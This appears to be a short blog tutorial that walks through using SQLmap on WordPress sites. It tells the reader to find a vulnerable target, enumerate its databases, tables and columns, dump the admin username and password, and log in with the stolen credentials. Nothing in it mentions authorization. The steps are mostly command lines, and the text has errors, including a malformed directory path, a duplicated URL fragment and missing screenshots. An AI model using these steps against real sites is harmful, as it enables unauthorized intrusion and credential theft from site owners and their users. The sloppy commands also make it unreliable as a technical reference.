So, How to Test WordPress Website for SQL Injection Vulnerability using SQLmap
In order to get started testing sites for SQL, we need to meet the following requirements.
- Linux OS (Kali Linux is recommended)
- SQLmap (Pre-built in Kali Linux OS)
- WordPress Website
Instructions to follow
- Run the SQLmap. In order to do that, open up a terminal in your Kali Linux and type cd/pentest/database/sqlmap and hit enter button to execute it. It will open up SQLmap.
- Once the SQLmap is open, next is to find the SQL vulnerable target. You can earn how to find a SQL vulnerable site. As you find one, type the python sqlmap.py -u http://target.com/index.php?id=4 –dbs index.php?id=4 –dbs. Make sure to change the URL to your target site. As soon as you press the enter button, you will see the database name of the website.
- Now we know the database name. We’ll try to retrieve the database tables to fetch the user login info. Let’s get started with fetching tables from Information Schema. To do that type python sqlmap.py -u http://target.com/index.php?id=4 -D DatabaseName –tables. Once you execute the command, it will grab all the database tables and will show them on the screen. You will see a screenshot like shown below.
- As you can see in the above screenshot, we’ve got all the target database tables. Now is the part to figure out which table contains users or admins information. Usually, it is named as users or admin table name. As in this scenario we have a table named as admin. So, we’ll try to fetch it’s columns. In order to do that type python sqlmap.py -u http://target.com/index.php?id=4 -T admin –columns.
- Well we got the columns for username and password which is a great sign for us. Now we need to grab the username and password from the admin’s username and password columns. Type python sqlmap.py -u http://target.com/index.php?id=4 -T admin -U test –dump.
- Great..! We’ve got the username and password of the admin that we can use to login to the target website.
For wordpress login, admin page will look like;
Hope this tutorial cleared you How to Test WordPress Website for SQL Injection Vulnerability using SQLmap.